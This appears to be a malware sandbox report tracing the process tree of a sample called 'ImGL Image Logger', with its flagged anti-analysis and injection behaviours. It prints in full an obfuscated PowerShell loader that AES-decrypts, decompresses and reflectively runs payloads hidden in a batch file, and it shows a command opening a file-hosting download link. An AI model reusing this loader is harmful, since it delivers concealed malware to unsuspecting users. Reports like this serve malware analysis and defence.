PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe
PID 5084 wrote to memory of 2924	5084	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:608

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d70caab9-0db8-4d3d-900d-baaaaf2f10b7}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4472

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{fd999d42-acb8-439d-9429-c4b6267e9877}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5892

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3b1a4de0-2f8b-4801-9b5e-976aaaa038d0}
2⤵
PID:1564

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{12bc77ce-b8ab-41e3-a425-e57741a7919c}
2⤵
PID:3252

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{08c53408-a4ce-4e34-9756-d07320a114a5}
2⤵
PID:5696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell start shell:Appsfolder\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge https://gofile.io/d/c5Rqpr
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-redirect=Windows.Launch https://gofile.io/d/c5Rqpr
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffef8d346f8,0x7ffef8d34708,0x7ffef8d34718
2⤵
PID:1140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
2⤵
PID:3108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
2⤵
PID:2924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:1
2⤵
PID:432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
2⤵
PID:3088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
2⤵
PID:3232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3924 /prefetch:1
2⤵
PID:2796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3032 /prefetch:1
2⤵
PID:4420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
2⤵
PID:2156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
2⤵
PID:1492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
2⤵
PID:2880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:1
2⤵
PID:5096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
2⤵
PID:4512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:1
2⤵
PID:2668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
2⤵
PID:4772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6984 /prefetch:1
2⤵
PID:3476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7984 /prefetch:1
2⤵
PID:5248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7820 /prefetch:1
2⤵
PID:5240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7588 /prefetch:1
2⤵
PID:5232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7576 /prefetch:1
2⤵
PID:5224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7424 /prefetch:1
2⤵
PID:5216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8220 /prefetch:1
2⤵
PID:5368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7992 /prefetch:1
2⤵
PID:5360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8600 /prefetch:1
2⤵
PID:5792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8868 /prefetch:1
2⤵
PID:5924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8480 /prefetch:1
2⤵
PID:5996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9380 /prefetch:1
2⤵
PID:6012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9644 /prefetch:1
2⤵
PID:5760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10024 /prefetch:1
2⤵
PID:5688

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8768 /prefetch:1
2⤵
PID:6068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10260 /prefetch:1
2⤵
PID:6064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10500 /prefetch:1
2⤵
PID:6272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10832 /prefetch:1
2⤵
PID:6336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11036 /prefetch:1
2⤵
PID:6728

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11480 /prefetch:8
2⤵
PID:6748

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
2⤵
- Drops file in Program Files directory
PID:6948

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7d7075460,0x7ff7d7075470,0x7ff7d7075480
3⤵
PID:6976

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11480 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:6172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8080 /prefetch:1
2⤵
PID:6668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8060 /prefetch:1
2⤵
PID:6676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10368 /prefetch:1
2⤵
PID:6020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11176 /prefetch:1
2⤵
PID:5400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10348 /prefetch:1
2⤵
PID:6780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=11864 /prefetch:8
2⤵
PID:6900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11484 /prefetch:1
2⤵
PID:6112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11928 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:6912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4473412976776781374,4615901119173924491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10196 /prefetch:1
2⤵
PID:6892

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5020

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3880

C:\Users\Admin\Desktop\ImGL Image Logger\ImGL.exe
"C:\Users\Admin\Desktop\ImGL Image Logger\ImGL.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5476

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C cd /d %systemdrive% & C:\Users\Admin\AppData\Local\Temp\5352c375-9aa2-426c-83e1-b486588001ac.bat & exit
2⤵
PID:2804

C:\Users\Admin\AppData\Local\Temp\5352c375-9aa2-426c-83e1-b486588001ac.bat.exe
"5352c375-9aa2-426c-83e1-b486588001ac.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function MwFMr($vXaCN){ $VwbLM=[System.Security.Cryptography.Aes]::Create(); $VwbLM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VwbLM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VwbLM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NPRiiZwfydr2EPDpG1kujtbpLiUA2dIDHHcnlbJhYL4='); $VwbLM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVHTpkJ+Ogq5s7sEEUURbg=='); $UfWJi=$VwbLM.CreateDecryptor(); $return_var=$UfWJi.TransformFinalBlock($vXaCN, 0, $vXaCN.Length); $UfWJi.Dispose(); $VwbLM.Dispose(); $return_var;}function QKtYD($vXaCN){ $ZPGyH=New-Object System.IO.MemoryStream(,$vXaCN); $FtFLD=New-Object System.IO.MemoryStream; $zfLIM=New-Object System.IO.Compression.GZipStream($ZPGyH, [IO.Compression.CompressionMode]::Decompress); $zfLIM.CopyTo($FtFLD); $zfLIM.Dispose(); $ZPGyH.Dispose(); $FtFLD.Dispose(); $FtFLD.ToArray();}function wazmV($vXaCN,$EwdaX){ $jxfxx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vXaCN); $nKlfp=$jxfxx.EntryPoint; $nKlfp.Invoke($null, $EwdaX);}$RZLpH=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\5352c375-9aa2-426c-83e1-b486588001ac.bat').Split([Environment]::NewLine);foreach ($FvXIR in $RZLpH) { if ($FvXIR.StartsWith(':: ')) { $KtNjW=$FvXIR.Substring(3); break; }}$oDBjl=[string[]]$KtNjW.Split('\');$HscYZ=QKtYD (MwFMr ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($oDBjl[0])));$dbKLW=QKtYD (MwFMr ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($oDBjl[1])));wazmV $dbKLW (,[string[]] (''));wazmV $HscYZ (,[string[]] (''));
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:640

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); 